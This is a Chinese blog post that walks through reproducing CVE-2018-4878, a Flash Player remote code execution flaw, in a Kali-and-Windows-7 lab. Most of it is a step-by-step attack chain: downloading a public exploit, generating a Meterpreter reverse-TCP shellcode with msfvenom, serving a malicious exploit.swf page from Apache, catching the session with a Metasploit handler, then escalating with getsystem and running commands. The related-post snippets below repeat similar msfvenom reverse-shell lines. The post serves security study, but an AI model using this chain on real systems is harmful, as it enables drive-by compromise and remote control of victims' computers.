Flash 0day漏洞(CVE-2018-4878复现)

最新推荐文章于 2023-01-17 09:48:06 发布
最新推荐文章于 2023-01-17 09:48:06 发布
阅读量437 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: CVE Flash
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44897902/article/details/102537470
版权

漏洞名: CVE-2018-4878

危害: 造成远程命令执行
影响范围: Flash Player28.0.0.137及以前的所有版本

准备工作:
kail: 192.168.91.146
win7,Flash Player28.0.0.137,IE8
这是一位前辈的Player:
链接:https://pan.baidu.com/s/1dotCoCx0AX8sgUaOqFT9vw 密码:0li0
事先下好exp:

wget https://raw.githubusercontent.com/backlion/demo/master/CVE-2018-4878.rar

解压:

rar x CVE-2018-4878.rar

如果出现找不到命令的情况,执行:

wget https://www.rarlab.com/rar/rarlinux-x64-5.5.0.tar.gz tar -zxvf rarlinux-x64-5.5.0.tar.gz cd rar make install mkdir -p /usr/local/bin mkdir -p /usr/local/lib cp rar unrar /usr/local/bin cp rarfiles.lst /etc cp default.sfx /usr/local/lib

使用msfvenom

msfvenom -p windows/meterpreter/reverse_tcp LHOST=主机ip LPORT=6666 -f python > /root/shellcode.txt

生成一个python类型的shellcode
在这里插入图片描述
打开 /root/shellcode.txt
在这里插入图片描述

将生成的shellcode.txt里面的内容复制,并覆盖cve-2018-4878.py里面的shellcode
在这里插入图片描述

并将里面的stageless = True改为False,打开文件的地址改为自己的储存地址:

在这里插入图片描述
在这里插入图片描述

然后运行python文件,运行完之后生成两个文件:
在这里插入图片描述
在这里插入图片描述
将exploit.swf和index.html复制到/var/www/html下,启动apache服务:

 service apache2 start

开始复现:
打开msfconsole:
输入以下命令:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.91.146

set lport 6666

exploit

在这里插入图片描述
在这里插入图片描述

现在打开win7,访问我们的网页,192.168.91.146/index.html
在这里插入图片描述

kail:暂无反应,估计是因为win7虚拟机ie未响应,唉,毕竟是这么老的版本了
之后配置了一下,kail的ip改为:192.168.91.150
在这里插入图片描述
成功穿透,得到session;

使用shell命令获取目标主机的cmd:
在这里插入图片描述
getsystem:可以获取管理员权限
之后就可以随意输入命令啦
在这里插入图片描述
打开计算器并截图:

execute -f calc.exe
screenshot

在这里插入图片描述
在这里插入图片描述

ring4ring
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
漏洞复现 CVE-2018-4878 Flash
weixin_44664530的博客
04-21 220
受影响版本 漏洞复现环境 Kali Linux Windows 7 sp1 cve-2018-4878.py flashplayer_activex_28.0.0.137.exe 工具自行下载 链接:https://pan.baidu.com/s/1Q-ryRThsdhsvOIc_Q5E9Bw 提取码:owad 环境配置 将flashplayer_activex_28.0.0.137.exe安装...
cve-2018-4878漏洞复现
06-02 4572
靶机:Windows7 sp1 条件:Adobe Flash 28.0.0.137及其之前的版本     IE8浏览器及以前版本(IE9好像也行) 所需工具已上传 kali:192.168.43.16 (需要输入的命令均用<>标记出来,<>不需要输入) 准备工作: kali中打开终端,找到下载的cve-2018-4878工具,切换到该路径(这种工具在未来应该尽量...
Flash 零日漏洞复现CVE-2018-4878
andiao1218的博客
03-15 209
项目地址:https://github.com/Sch01ar/CVE-2018-4878.git 影响版本为:Adobe Flash Player <= 28.0.0.137 攻击机器IP:192.168.220.152 目标靶机:192.168.220.151,浏览器为360浏览器 用msfvenom生成一个shellcode ┌─[root@sch01ar]─[...
Adboe Flash远程代码执行_CVE-2018-4878漏洞复现
WY92139010的博客
07-03 258
Adboe Flash远程代码执行_CVE-2018-4878漏洞复现 一、漏洞描述 该漏洞可针对windows用户发起定向攻击。攻击者可以诱导用户打开包含恶意Flash代码文件的Microsoft Office文档、网页、垃圾电子邮件等。 二、漏洞影响版本 Flash Player版本28.0.0.137以及之前的所有版本    三、漏洞复现环境搭建 攻击机:kali...
CVE-2018-4878复现
大方子
10-07 4322
前言: CVE-2018-4878利用flash漏洞来进行攻击,如果受害者的flash版本在28.0.0.137及其之前,那么攻击者可以通过诱使受害者点击链接访问特定网页来控制受害者的电脑。 1 漏洞影响范围 Flash Player28.0.0.137及以前的所有版本 2 漏洞复现 2.1 测试环境 攻击机:kali2017 靶机:win7_x64+IE8+FLASH_playe...
flash漏洞利用CVE-2018-4878
06-14
flash漏洞利用CVE-2018-4878。 。。。
CVE-2018-18778.docx
07-23
**CVE-2018-18778:mini_httpd任意文件读取漏洞详解** CVE-2018-18778 是一个针对 mini_httpd 服务器的严重安全漏洞,它允许攻击者通过精心构造的HTTP请求来读取服务器上的任意文件。这个漏洞源于 mini_httpd 对于...
Flash漏洞CVE-2018-4878复现
锋刃科技的博客
07-29 1348
简介 攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会被“远程代码执行”,并且直接被getshell。 影响版本 FlashPlayer28.0.0.137及以前的所有版本 漏洞复现 使用msfvenom生成shell代码 生成代码,其中lhost为kali的ip地址,lport为自定义的端口号 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.111.129 lport=66.
Flash配置不当漏洞”详解
m0_49025459的博客
01-17 1775
可被用来进行跨域访问,可能会导致“跨站点伪造请求”或“跨站点跟踪”(“跨站点脚本编制”的变体)之类的攻击,从而导致其它用户的信息被非法读取。导致不受信任的第三方域的flash也能访问当前域的资源,绕过同源策略的限制,可为后续渗透攻击做准备,flash的跨域均可能导致XSS,CSRF等问题。Flash 显示程序接受 AllowScriptAccess 之类的对象参数。
CVE-2018-4878 flash 漏洞利用教程
凝聚力安全团队
10-25 1437
目录漏洞描述漏洞检测漏洞利用漏洞加固参考链接 漏洞描述 漏洞检测 漏洞利用 漏洞加固 参考链接
flash跨域劫持漏洞
xixixi
09-13 2677
参考资料1 参考资料2 Adobe Flash 2017年7月25号,在官方博客上宣布到2020年底停止更新Flash,鼓励开发者尽早使用新的标准( HTML5、WebGL 和 WebAssembly)进行开发 ActionScript:(简称AS)是由Macromedia(现已被Adobe收购)为其Flash产品开发的,最初是一种简单的脚本语言,现在最新版本ActionScript...
CVE-2018-4878 漏洞复现
qq_42039946的博客
05-14 1074
1.生成shellcode msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.8.130 lport=8888 -f python>shellcode.txt lhost的修改为自己kali平台的IP,端口号也可以自行修改 2.查看shellcode root@kali:~# cat shellcode.txt 3.编辑CVE-2018-4878-master.py文件 3.1 替换shellcode 3.2修改swf..
本地复现Flash 0day漏洞(CVE-2018-4878)
weixin_30627381的博客
03-17 396
影响版本: Adobe Flash Player <= 28.0.0.137 EXP下载地址: 链接: https://pan.baidu.com/s/1_VVQfdx6gsJvEDJj51JgMQ 密码: d8tm 漏洞复现: 攻击机:kail 靶机:win7 x64 浏览器:360浏览器 0x01 生成shellcode msfvenom -p windows...
复现漏洞Flash 0day漏洞(CVE-2018-4878)时翻车
t_i_m_e的博客
04-22 931
i春秋有最近新出的flash 0day复现漏洞的步骤,需要用到kali环境,靶机环境以及web服务器环境,此漏洞官方目前还没有推出最新更新版本。步骤一:打开kali用msf生成一个kali虚拟机ip,任意端口的python脚本木马并保存为txt文件步骤二:在root文件夹下新建一个后缀为.py的文档然后将以下代码复制上去(复制大神的,我也不明白都是什么东西)#!/usr/bin/env pytho...
[漏洞复现] CVE-2018-4878 Flash 0day
神仙哥哥的博客
05-23 2754
1、漏洞概述 2018年2月1号,Adobe官方发布安全通报(APSA18-01),声明Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞CVE-2018-4878)。 攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会被“远程代码执行”,并且直接被getshell。 直到2018年2月5号,Adboe才发布补丁来修复此0...
PHP 输入验证漏洞 CVE-2018-10547复现
最新发布
10-24
PHP 输入验证漏洞 CVE-2018-10547是一种远程代码执行漏洞,攻击者可以通过构造恶意IMAP服务器名称来注入任意OS命令语义,从而执行任意代码。以下是复现漏洞的步骤: 1. 构造恶意IMAP服务器名称,包含“ -...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值